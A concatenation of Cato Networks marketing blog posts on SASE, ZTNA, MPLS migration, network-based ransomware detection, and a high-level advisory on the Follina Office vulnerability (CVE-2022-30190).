How many apples did you just buy? Did you take a Support contract out on every apple? Are you actively tracking the start and end-date of the renewal? Have you invested in administrative staff to ensure you have consistency of care? Will this vendor assist you with bruised apples, or does your contract only cover total losses? These are questions you should be asking yourself as you review the entire total cost of ownership for every single purchased asset. If you’ve amortized an apple over a 5-year period, do you think you’ll still be wanting the same apple 5 years from now? Your taste may have changed.
Oh, and did you remember, currently you haven’t just purchased apples for your company. Life isn’t that simple. You’ve also purchased your grapes, peaches, plums, pears, bananas and more, because you want to maintain in complete control of your network using point products. How does this make you feel having to constantly maintain this supply chain? Your life has become confusing, and this all started because somebody originally said that you were ‘comparing apples to oranges.’
The Cato Solution
We’ve been talking in metaphors during this article, but let’s drop the pretence and start talking directly. Today your network is most likely built with a series of different products built by a myriad of vendors. You have network firewalls, internet gateways, CASB engines, VPN concentrators, anti-malware engines, Intrusion Prevention Systems (IPS) and many more. Each of these products have been built by their vendors in the belief that they are the best in their own functional field, however to you as a consumer of products, you have a wide portfolio of products that you must learn (as well as maintain, update, and manage.) Dealing with these administrative tasks are likely not the reason you decided to get into IT, but here you are. Life doesn’t have to be this way.
Cato Networks offers a truly converged service offering covering all aspects of Networking, Security and Access. The term ‘service offering’ is key, as we maintain, manage, and continually improve our service in the cloud, ensuring that you have the latest-and-greatest in networking and security coverage without having to lift a finger. Unlike product-based companies, you don’t have to have significant warehouse space to store hundreds of servers and appliances, you don’t need to worry about multitudes of service contracts, and best of all, you don’t need to worry about upgrading or patching (as this is done by Cato Networks.)
How to Solve the Fruit Bowl Challenge with Cato
So, in short, apples are great, and oranges are fine. But why limit yourself? What if I told you that you could have BOTH apples and oranges? What if I told you that you could get both using a single service subscription? What if I told you that we’re constantly growing our catalogue of SASE features and offerings, so you also get peaches, plums, pineapples, and pears at no extra cost? What if I told you that new fruit is being added every two weeks? Why limit yourself to just buying apples, when Cato can offer you every fruit under the sun, whenever you want it, all at the click of a button.
We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges,...
Solving Real-World Challenges – Your Pathway to SASE We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges, and IT challenges are business challenges. As digitization continues to advance, these leaders continue to face an array of challenges, and the solutions they choose will determine their success or failure.
This article provides IT and security professionals with actionable ideas for selecting a robust platform for digital transformation to address the network and security challenges that adversely impact their business.
Real-world challenges in need of solutions
The Cato SASE Approach
Key questions to ask yourself when looking for a solution
Mapping Your Journey
Real-world Challenges Breeds New Networking and Security Considerations
Global Business Expansion Creates New Connectivity Requirements
We are a global business society that is constantly expanding, whether organically into new markets or through mergers and acquisitions into new business lines. Whatever the impetus, there are real challenges these organizations will face. Adding new locations, for example, requires planning for global and local connectivity, which could be very inconsistent, depending upon the region.
In the case of mergers, we must deal with inconsistent or incompatible networks architectures, while factoring in the unreliable nature of global connectivity over a public internet. And let’s not forget inconsistent security policies that add to your headaches.
And finally, we must consider how all this affects migrating new users and apps onto your core network, as well as ensuring access and security policies are correct. Not impossible, but this could take weeks or months to achieve.
All this results in unexpected consequences.
Rapid site deployment
Public Internet Transport
On-premise to Cloud Migration Spurs Capacity Constraints
Most obstacles in cloud adoption are related to basic performance aspects, such as availability, capacity, latency and scalability. Many organizations neglect to consider bandwidth and capacity requirements of cloud applications. These applications should deliver similar or better performance as legacy on-premise. However, with the rush to adapt to the new Covid-normal, many are finding this is far from reality.
Scalability is also an issue with cloud deployments. As businesses continue to grow and expand, the greater the need for a cloud network that scales at the speed of their business, and doesn’t restrict the business with its technical limitations.
All together, these are real issues IT teams continue to face today, and until now, saw little to no relief in sight.
Capacity planning and cost management
Poor app performance
Expanding Cyber Threat Landscape
Every year, like clockwork, we witness numerous global companies attacked by cyber criminals at least once per day. Many have had sensitive data stolen and publicly leaked. The pandemic only exacerbated this, pushing more employees further from the enterprise security perimeter. The growth in Work-From-Anywhere (WFA) introduced more remote worker security challenges than many expected, and not many were truly prepared.
Additionally, as more organizations move their apps to cloud, providing security for these apps, as well as safe use of 3rd party SaaS apps, became an even stickier point for today’s enterprises. This, along with securing remote workers, is pushing IT leaders to face the harsh reality of their current cyber defense short-comings.
As these businesses attempt some form of return to normal, it’s clear we may never make it back to traditional full-time office setup. WFA, as well as increased cloud usage, is here to stay, meaning the threats to the business will only increase. This means the potential costs of cyber breaches will follow suit.
Expanding cyber threat landscape
Securing Work-from-anywhere (WFA)
Improper employee usage
The Cato SASE Approach to Rapid Digital Transformation
It’s easy for most organizations to take a traditional approach to these challenges by looking for point solutions or creative chaining of technologies to create a bundled solution. While this provides an initial “feel-good” moment, this complex approach, invariably, creates more problems than it solves.
Cato addresses these challenges through simplicity, and accomplish this through our converged, cloud-native approach. The Cato SASE (Secure Access Service Edge) Cloud converges core capabilities of networking, security and access management into a single software stack that delivers optimized cloud access, predictable performance, and unified policy management. Our SASE Cloud also provides complete visibility to inspect all traffic flows and provide advanced, holistic threat protection and consistent policy enforcement across a global private backbone.
Cato addresses the challenges of global connectivity with our global private backbone, providing resiliency and performance SLA guarantees. Our cloud acceleration and optimization address the performance challenges faced when migrating enterprise apps to a cloud data center. And we address the security challenges with advanced, holistic security tools like NGFW, SWG, NextGen Anti-Malware, IPS, CASB and DLP.
The Cato SASE Cloud enables enterprises to more rapidly and securely deliver new products and services to market, and more quickly respond to changes in business and technology dynamics that impacts their competitiveness.
What is SASE and its Core Requirements?
When deciding on SASE solutions, it is helpful to understand the core requirements as specified by Gartner and compare the various vendors in the market. For SASE to deliver on the promise of infrastructure simplicity, end-end optimization and limitless scalability, it must adhere to certain requirements: Converged, Cloud-native, Global, All Edges and Unified Management.
Converged – A single software stack that combines network, security, and access management as one. This eliminates multiple layers of complexity. There is no need to stitch together bundles of disparate technologies. No need for multiple configuration tools to configure these different technologies. Convergence leads to simplistic architecture, easier management, and lower overall costs to the business.
Cloud-Native – Built in the cloud for the cloud. Unlike appliances and virtualized solutions based upon appliances, being cloud-native enables vendor to deliver more flexibility in deployment and scale easier and faster when customers require more capacity.
Global – Having a global presence means a network of PoPs everywhere, connected via a global private backbone. This means the network is everywhere the customer business is, delivering guaranteed performance and optimization for all traffic, consistent policy enforcement globally, network resilience to keep the business running.
All Edges – Consistently and seamlessly delivering services to all edges (branch, endpoint, data center, cloud) without complex configuration or integration.
Unified – A single, unified management console to provision and manage all services. No need to build dashboards to communicate with multiple technologies to manage the deployment .
These are non-negotiable requirements that only a true Cloud-Native SASE solution can deliver. Appendix A highlights how the Cato SASE Cloud compares to appliance-based solutions.
7 Questions You Must Ask Before Selecting Your Next Solution
To solve these issues, here are some key questions to ask yourself and your team. This will help you find the right solution to alleviate these challenges.
1. What real problems are we trying to solve?
Identify what technical challenges are inhibiting you from delivering the best app, networking, and security experience for the business. Discover which projects are on hold because your infrastructure can’t accommodate them. The answers will provide you with insights into the actual problems you need to solve.
2. Which solution solves this, while scaling at the speed of our business?
The natural response when encountering point-problems, is to find a point-solution. When doing so, ask yourself which solution delivers a more holistic approach to all your concerns (from question 1) while also providing a platform that scales at the speed of your business.
3. How can we ensure cost-effective, business continuity?
Business continuity is non-negotiable, so when searching for a solution, ensure you find one that provides a resilient architecture that keeps your business running, no matter what happens.
4. With limited resources, how fast can we deploy new sites?
Your solution shouldn’t just look good on paper, it needs to work well in practice. You can’t wait two, three or six months to launch new branches. Find a solution that enables rapid, zero-touch deployment, with minimal impact on your teams.
5. How can we build and maintain a consistent policy structure?
Multiple configuration tools can create policy mismatches, which in turns, creates gaps and puts your critical applications at risk. To reduce this risk, find a solution that addresses configuration inconsistencies.
6. What’s the right amount of security?
Security is an imperative, so most businesses try to implement multiple solutions with lots of cool-sounding features to make themselves feel secure. Unfortunately, multiple point solutions create security blind spots. Additionally, about 80%-90% of “cool” security features are never used. Achieve more with less by finding a solution that improves your security posture, independent from the size of your corporation or the size of your IT team
7. What’s our best option for global connectivity?
Connectivity can make or break your business. Find a solution that provides increased capacity, guaranteed performance, and a global private backbone. Don’t settle for less.
Mapping Your SASE Journey in 4 Easy Steps
Now that you understand the networking and security challenges adversely affecting your business and their proposed solutions, now it’s time to map out your SASE journey. Doing this can be easier than you might think.
After you’ve answered the above questions, it’s now time to prioritize and create your migration plan. You may have one problem to solve, and in this case it’s easy. But most will have several, so once determined and prioritized, it’s time to plan and put it into action. Of course, Cato and our partners can assist, and even recommend a migration plan.
2. Solve the problem:
This is wholly up to the organization. Some may prefer to tackle low-hanging fruit projects to build confidence in the teams. In this case, easy problems may go first. But others believe in “Go Big or Go Home”, so they may start with the most critical problems first. It’s basically up to the organization to define.
Observe the “wow” moments of that problem being solved. Whether performance, enhanced security, global connectivity, and so on – observe and enjoy. Then move onto the next problem or project.
4. Repeat and observe.
It’s a straight-forward journey, and a well-defined plan makes it all flow smoothly.
Does Your Solution Allow You to Plan for the Future?
Solving problems the legacy way is how we acquired the complexity beast we have today. So, it’s time we change the game and become more strategic about addressing our IT challenges.
The Cato SASE Cloud does this by converging all the capabilities organizations need today into a single platform, while future-proofing their businesses for whatever is next. In contrast, a non-SASE approach forces you to spend time and resources evaluating, acquiring, and integrating multiple technologies to address each requirement.
Taking a platform approach to your transformation journey will address the challenges of today and prepare you for the opportunities of tomorrow. Taking a Cato SASE approach will enable your network to scale at the speed of your business.
Appendix A – SASE Core Requirements Comparison Chart
Gartner SASE Requirements Cato Appliance Solutions Cato SASE Advantage for Customers Converged Yes One single software stack with the network and security as one NO A mixed collection of appliances that are stitched together. Network and security simplicity and uniformity in policy enforcement can only be achieved through convergence. Cloud-Native Yes Built as a distributed cloud-native service from scratch, with no appliance baggage NO Use virtualized hardware placed in the cloud Easy and inexpensive to scale when increased capacity is required. Customers can scale and grow at the speed of their business, and not be limited by the complexity of a stale network. Global Yes 75+ PoPs available located near every major business center. Each has an independent expansion plan. Limited Relying on IaaS for hosting PoPs limits availability and degrades performance. Growth depends on IaaS plans, not the SASE vendor's Cato’s global private backbone delivers performance guarantees, resiliency and policy consistency between sites across the WAN and cloud. All Edges Yes Designed with light edge connectors (SD-WAN, SDP, Cloud) with a cloud first architecture to deliver same service to all edges Limited Delivering services to different edges requires a different portfolio solution. So, this is only achieved by stitching together portfolio products Connecting and servicing all edges (branch, endpoint, data center, cloud) does not require complex configuration or integration Management Unified One console to control all SD-WAN, security, remote access, and networking policies with full analytics and visibility. Self-service or managed service No Multiple configuration interfaces to navigate A single policy management app eliminates configuration gaps by ensuring consistent policy configurations & enforcement across the entire network.
About Cato Networks
Cato is the world's first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure brach Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever's next.
For any questions about the ideas suggested in this article, and if you have some more of your own, feel free to contact us at: catonetworks.com/contact-us/
As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud,...
Cato’s Ransomware Lab Births Network-based Ransomware Prevention As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation.
Of course, this isn’t our first foray into malware protection. Cato has a rich multilayered malware mitigation strategy of disrupting attacks across the MITRE ATT&CK framework. Cato’s antimalware engine prevents the distribution of malware in general. Cato IPS detects anomalous behaviors used throughout the cyber kill chain. Cato also uses IPS and AM to detect and prevent MITRE techniques used by common ransomware groups, which spot the attack before the impact phase. And, as part of this strategy, Cato security researchers follow the techniques used by ransomware groups, updating Cato’s defenses, and protecting enterprises against exploitation of known vulnerabilities in record time.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
What’s being introduced today are heuristic algorithms specifically designed to detect and interrupt ransomware. The machine-learning heuristic algorithms inspect live SMB traffic flows for a combination of network attributes including:
File properties such as specific file names, file extensions, creation dates, and modification dates,Shared volumes access data such as metrics on users accessing remote folders,Network behavior such as creating certain files and moving across the network in particular ways, andTime intervals such as encrypting whole directories in seconds.
Once found, Cato automatically blocks SMB traffic from the source device, preventing lateral movement or file encryption, and notifies the customer.
The work comes out of our ransomware lab project that we started several months ago. The lab uses a standalone network within Cato where we reproduce ransomware infections in real-life organizations. “We execute them in the lab to understand how they do their encryptions, what file properties they change, and other parts of their operations and then we figure out how to optimize our heuristics to detect and prevent them,” says Tal Darsan, manager of managed security services at Cato. So far, the team has dug into more than dozen ransomware families, including Black Basta, Conti, and Avos Locker.
To get a better sense of what our ransomware protections bring, check out the video below:
For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now...
How to Gradually Deploy SASE in an Enterprise For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified, cloud-delivered service. Gartner predicts that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”SASE converges networking and security into a single architecture that is:
And covers all edges
Enterprises can deploy SASE at the flip of a switch or gradually. In this blog post, we list five different gradual deployment use cases that enterprise IT can incorporate. For more detailed explanations, you can read the in-depth ebook that this blog post is based on, “SASE as a Gradual Deployment”.
[boxlink link=”https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider”] 5 Questions to Ask Your SASE Provider | eBook [/boxlink]
Use Case #1: MPLS Migration to SD-WAN
SASE can support running MPLS alongside SD-WAN. In this first use case, enterprises leverage SASE’s SD-WAN functionalities, while turning off MPLS sites at their own schedule. Existing security and remote access solutions remain in place.
Use Case #2: Optimize Global Connectivity
SASE improves performance across global sites and WAN applications. Enterprises can use SASE for global connectivity and keep MPLS connections for critical WAN applications.
Use Case #3: Secure Branch Internet Access
SASE eliminates the need for edge security devices by including new technologies instead. For example, NGFW, IPS, ZTNA, and more. In this use case, MPLS is augmented with SASE security.
Use Case #4: Cloud Acceleration and Control
SASE’s global network of PoPs (Points of Presence) optimizes traffic in the network and to cloud data centers. Enterprises can leverage SASE instead of relying on the erratic Internet.
Use Case #5: Remote Access
SASE optimizes and secures remote traffic. By replacing VPNs with SASE, enterprises can ensure remote access to all edges through a secure network of global PoPs.
Introducing Cato: The World’s First SASE Service
Cato is the world’s first SASE platform, which supports gradual migration while connecting all network resources, including branches, mobile, remote employees, data centers, and more. Through a global and secure cloud-native network, Cato also offers:
Managed threat detection and response
Intelligent last-mile management
So much more
To learn more about MPLS to SASE deployment, read the ebook "SASE as a Gradual Deployment".
Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The...
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality.
For IT teams, this abrupt change was unexpected. As a result, organizations did not have the infrastructure in place required to support remote users. At first, IT teams tried to deal with the new situation by stacking up legacy VPN servers. But these appliances did not meet agility, security and scalability demands.
Now, organizations need to find a different strategic solution to enable a productive hybrid workforce that can adapt to future changes. In this blog post, we cover the three main requirements of such a strategic solution and our technological recommendations for answering them.
(For a more in-depth analysis, you can read the ebook “The Hybrid Workforce: Planning for the New Working Reality”, which this blog post is based on.)
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink]
Requirement #1: Seamless Transition Between Home and Office
Most traditional infrastructure, namely MPLS, SD-WAN and NGFW/UTM, is focused on the office. However, there is no infrastructure that extends to remote work and home environments. This extension is required to enable a remote workforce.
Solution #1: ZTNA and SASE
ZTNA (Zero Trust Network Access) and SASE (Secure Access Service Edge) decouple network and security capabilities from physical appliances. Instead, they provide them in the cloud. This solution converges all infrastructure into a single platform that is available to everyone, everywhere.
Requirement #2: Scalable and Globally Distributed Remote Access
Today’s VPNs are appliance-centric, making them resource-intensive when scaling and maintaining them.
Solution #2: Remote Access as a Service
A global cloud service can provide remote access to a significant user base. This will free up IT resources for infrastructure management.
Requirement #3: Optimization and Security for All Traffic
Having remote access is not enough. Teams also need traffic optimization and security for performance and preventing breaches.
Solution #3: A Single Solution for All Needs
Some remote access solutions include optimization and security for all traffic types. This can be done through WAN optimization, cloud acceleration and threat prevention.
A global and agile network and security infrastructure can serve your hybrid workforce and help you prepare for whatever is next. Read the ebook to learn how.
A CIO position is exciting but also challenging, especially if it’s your first role… And, if you don’t plan what you want to accomplish, you...
How to Succeed as a CIO in 100 Days A CIO position is exciting but also challenging, especially if it’s your first role... And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use it to achieve professional success and establish your position as an invaluable business leader. (And, for more in-depth explanations, tips and stats, check out the e-book this blog post is based on.)
Phase 1: Get to Know the Organization and the Team (3 weeks)
The first step at a new company is to get to know the people and learn the company culture. Spend time with your team, stakeholders and company leadership. Use this opportunity to learn about the business, IT’s contribution and where IT fits in the business’s future goals. During these talks, map out any potential gaps or weaknesses you can identify.
To see example questions to ask during these sessions, check out the eBook.
Phase 2: Learn the IT and Security Infrastructure (3 weeks)
Once you’ve understood the expectations from your department, it’s time to learn the network infrastructure and architecture.
Take scope of:
Technologies in use
The delivery model
On-site and off-site work
Digital transformation status
Similar to phase one, start mapping out any network strengths and weaknesses.
[boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink]
Phase 3: Set a Strategy and Goals (2 weeks)
Finally, now is the time to determine your strategy for the upcoming year.
Organize your notes from phases 1 and 2.
Research new technologies, tools, trends and capabilities that could be relevant to your industry and requirements.
Map out your department’s strengths, weaknesses, threats and opportunities.
Determine your vision and mission statement.
Define your objectives.
Phase 4: Incorporate Digital Transformation (2 weeks)
According to McKinsey Global, following Covid-19, companies are accelerating digitization by three to seven years, acting even 40 times faster than expected! This means that CIOs who want to be perceived as future leaders need to keep up to date with digital technologies.
Look beyond traditional architectures and into trends like cloudification, convergence and mobility. According to Lars Norling, Director of IT Operations from ADB Safegate “Our analysis clearly showed the shift in the IT landscape, namely extended mobility and the move towards providing core services as cloud services. This led us to look outside of the box, beyond traditional WAN architectures.”
Gartner identifies SASE (Secure Access Service Edge) as the leading transformative technology today. SASE converges network and security into one global cloud service while reducing IT overhead, ensuring speed and performance and incorporating the latest security solutions.
Phase 5: Set Priorities (2 weeks)
Are you excited to get started on executing your plan? It’s almost time to do so. But first, prioritize the activities you want to take on, based on business requirements, ROI, urgency and risks.
The steps above are intended to help you make days 101 and onwards a smashing success. So go over your plans, take a deep breath and get started. Good luck!
To learn more about digital transformation and SASE, let’s talk.
Read more about your first 100 days in the ebook, “Your First 100 Days as CIO: 5 Steps to Success”.
ZTNA is a Good Start for Security Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave...
ZTNA Alone is Not Enough to Secure the Enterprise Network ZTNA is a Good Start for Security
Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave the organization vulnerable to attack and are ill-suited to the modern distributed enterprise. Zero trust, which retracts the “perimeter” to a single asset, provides better security and access management for corporate IT resources regardless of their deployment location.
In many cases, zero trust network access (ZTNA) is an organization’s first step on its zero trust journey. ZTNA replaces virtual private networks (VPNs), which provide a legitimate user with unrestricted access to the enterprise network.
In contrast, ZTNA makes case-by-case access determinations based on access controls. If a user has legitimate access to a particular resource, then they are given access to that resource for the duration of the current session. However, accessing any other resources or accessing the same resource as part of a new session requires re-verification of the user’s access.
The shift from unrestricted access to case-by-case access on a limited basis provides an important first step towards implementing an effective zero trust security strategy.
Adopting ZTNA Alone Is Not Enough
The purpose of ZTNA is to prevent illegitimate access to an organization’s IT resources. If a legitimate user account attempts to access a resource for which they lack the proper permissions, then that access request is denied.
This assumes that all threats originate from outside the organization or from users attempting to access resources for which they are not authorized. However, several scenarios exist in which limiting access to authorized accounts does not prevent attacks.
[boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink]
Compromised or Malicious Accounts
ZTNA limits access to corporate resources to accounts that have a legitimate need for that access. However, an account with legitimate access can be abused to perform an attack.
One of the most common cyberattacks is credential stuffing attacks in which an attacker tries to use a certain individual’s compromised credentials for one account to log into another account. If successful, the attacker has access to an account with legitimate access whose requests may be accepted by a ZTNA solution. If this is the case, then an attacker can use this compromised account to steal sensitive data, plant malware, or perform other malicious actions.
Additionally, not all threats originate from outside of the organization. An employee could cause a data breach either via negligence or intentionally. For example, 29% of employees admit to taking company data with them when leaving a job. Legitimate users could also accidentally deploy malware on the corporate network. In 2021, 80% of ransomware was self-installed, meaning that the user opened or executed a malicious file that installed the malware. If this occurred on the corporate network, it would be within the context of a legitimate user account.
Users access corporate resources via computers or mobile devices. While a ZTNA solution may be configured to look for a combination of a user account and a known device, this device may not be trustworthy.
Devices infected with malware may attempt to take advantage of a user’s account and assigned permissions to gain access to the corporate network or other resources. If malware is installed on a user’s device, it may spread to the corporate network via legitimate accounts.
ZTNA’s access control policies alone are not enough to protect against infected devices. Solutions also need to include device posture monitoring to provide more information about the risk posed by a particular device. Common device posture monitoring features include identifying the security tools running on the device, the current patch level, and compliance with corporate security policies. Ideally, a ZTNA solution should provide the ability to tune device posture access requirements based on the requested resources and to incorporate other valuable information, such as the device OS and location.
ZTNA Should Be Deployed as Part of SASE
ZTNA is an invaluable tool for providing secure remote access to corporate resources. Its integrated access controls and case-by-case grants of access offer far greater security than a VPN. However, as mentioned above, ZTNA is not enough to implement zero trust security or to effectively secure an organization’s network and resources against attack. An attacker with access to a legitimate account - via compromised credentials or an infected device - may be granted access to corporate IT assets.
Effective zero trust security requires partnering ZTNA’s access control with security solutions capable of identifying and preventing abuse of a legitimate user account. Next-generation firewalls (NGFWs), intrusion prevention systems (IPS), cloud access security brokers, and other solutions can help to address the threats that ZTNA misses.
These capabilities can be deployed as standalone solutions, but this often results in a tradeoff between performance and security. Deploying perimeter-based defenses requires routing traffic through that perimeter, which adds unacceptable latency. On the other hand, most organizations lack the resources to deploy a full security stack at all of their on-prem and cloud-based service locations.
Secure Access Service Edge (SASE) provides enterprise-grade security without sacrificing network performance. By integrating a full network security stack into a single solution, SASE enables optimized performance by ensuring that expensive operations - such as decrypting a traffic stream for analysis - are only performed once. Its integrated network optimization capabilities and cloud-based deployment ensure high network performance and reliability, especially when backed by Cato’s network of dedicated backbone links between PoPs.
ZTNA as a standalone solution doesn’t meet corporate network security goals or business requirements. Deploying ZTNA as part of a SASE solution is the right choice for organizations looking to effectively implement zero trust.
Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems. Earlier today...
Cato Protects Against Microsoft Office Follina Exploits Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems.
Earlier today Microsoft issued CVE-2022-30190 that describes the remote code execution (RCE) vulnerability within Office. It can be exploited when the Microsoft Support Diagnostic Tool (MSDT) is called using by a URL from a calling application such as Word.
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
The vulnerability was discovered by nao_sec, the independent cybersecurity research team, who found a Word document ("05-2022-0438.doc") uploaded to VirusTotal from an IP address in Belarus. The Microsoft post explained how to create the payload and various work arounds.
Describing the vulnerability, nao_sec writes on Twitter, “It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code." The Hackernews quotes security researcher Kevin Beaumont, saying that “the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload.”
Beaumont has dubbed the flaw "Follina," because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Cato Immediately Protects Users Worldwide
Within hours of Microsoft’s reporting, Cato researchers were already working on implementing protections for Cato customers worldwide. Already, Cato’s multilayered security defense fully protected Cato-connected users. While no further action is needed, Cato customers are advised to patch any affected systems.
There are currently three ways attackers can exploit this attack:
Users can download a file or application containing the payload that will invoke the MSDT locally.
Users can download a file or application containing the payload that will get the invocation from the Internet (from the attacker’s sites)
User’s browser receives the payload in the response to direction from a malicious site, runs MSDT.
All three approaches are already blocked using the Cato Advanced Threat Prevention (ATP) capabilities. Cato’s anti-malware inspects and will block downloading of files or applications with the necessary payload to execute Follina. Cato IPS will detect and prevent any invocation from across the network or the Internet.
As we have witnessed with Log4j, vulnerabilities such as these can take organizations a very long time to patch. Log4j exploitations are still observed to this day, six months after its initial disclosure. With Cato, enterprises no longer see the delays from patching and are protected in record time.
Demonstration of Attack Exploiting CVE-2022-30190
MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services...
What Others Won’t Tell You About MPLS MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network.
5 Considerations for Evaluating MPLS and Its Alternatives
1. Agility: Can Your Network Move at the Speed of Business?
Modern enterprises need a solution that enables them to expand their business quickly and connect new sites to their existing networks. But traditional MPLS requires rolling out permanent infrastructure, which can take months and keeps businesses dependent on telco service and support.
2. Cost: Is Your Cost Per Megabit Too High?
The modern enterprise network is internet-bound, which makes it bandwidth-intensive. Enterprises need a solution that is priced in an internet-friendly manner since counting every megabit is counter-productive. But MPLS costs are megabit-based, and each megabit is pricey. Redundant circuits, resilient routing and WAN optimization drive the bill even higher.
3. Flexibility: Can The Business Transition Between On and Off-site Work?
New, post-pandemic workplaces have to be able to automatically transition between remote and on-site work. But in case of connectivity issues, transitioning to MPLS backups could cause significant delays that impede productivity.
4. Security: Can Enterprise Users Access Resources Anywhere?
To support remote work and a distributed workforce, resources, users, data and applications need to be secured wherever they are. But MPLS VPNs are hard to manage and backhauling traffic to the data centers adds latency, making the network vulnerable.
5. Management: Do You Have Visibility and Control of Your Network?
Modern businesses need co-managed networks so they can have visibility and control without having to take care of all the heavy lifting. But MPLS requires businesses to control the entire network or hand it all over to telcos.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=other_mpls"] What Others Won’t Tell You About MPLS | Download eBook [/boxlink]
Is SD-WAN the Solution for MPLS’s Shortcomings?
SD-WAN can replace some types of MPLS traffic, saving businesses from many of MPLS’ costs. However, MPLS doesn’t answer all business needs, including:
Cloud - SD-WAN focuses on physical WAN.
Security - SD-WAN employs only basic security features.
Remote and Hybrid Work - SD-WAN is a branch-oriented solution that cannot support remote work on its own.
Visibility - SD-WAN requires adding more vendors, which creates fragmented visibility.
How SASE Answers All Future WAN Needs
The solution for all future enterprise network needs is a converged solution that includes SD-WAN, a global backbone, pervasive security, and remote access in a single cloud offering.
A SASE platform offers just that:
A single platform for all capabilities, which can be activated separately at the flip of a switch.
A global WAN backbone over the cloud, ensuring traffic runs smoothly with minimal latency across global PoPs.
A unified security-as-a-service engine by converging ZTNA with SD-WAN.
A single pane of glass for all policies, configurations, monitoring, and analytics.
Flexible management - self-service, co-managed, or fully managed.
Read more about MPLS vs. SASE in the complete eBook, What Others Won’t Tell You About MPLS.
As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs...
Azure SD-WAN: Cloud Datacenter Integration with Cato Networks As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs and complexity. There’s been no good approach to building an Azure SD-WAN — until now. Cato’s approach to Azure SD-WAN improves performance AND simplifies security, affordably. Let’s see how.
Azure SD-WAN’s MPLS and SD-WAN Problem
When organizations start relying on Azure, two problems become increasingly apparent. First, how do you secure your Azure instance? Running virtual firewalls in Azure adds complexity and considerable expense, necessitating purchase of additional cloud compute resources and third-party licenses. What’s more, virtual firewalls are limited in capacity, requiring upgrades as traffic grows. Cloud performance may suddenly decline because the firewall is choking the network. Adding other cloud instances requires additional tools, complicating operations.
You can continue to rely on your centralized security gateway, backhauling traffic from branch office inspection by the gateway before sending the traffic across the Internet to Azure. You can even improve the connection between the gateway and Azure with a premium connectivity service, such as Azure ExpressRoute. But, and here’s the second issue, how do you deal with the connectivity problem?
Branch offices that might otherwise be a short hop away from an Azure entrance point must now send traffic back to the centralized gateway for inspection before reaching Azure. The approach does nothing for mobile users who sit off the MPLS network regardless.
And what happens as your cloud strategy evolves and you add other cloud datacenter services, such as Amazon AWS or Google Cloud? Now you need a whole new set of security and connectivity solutions adding even more cost and complexity.
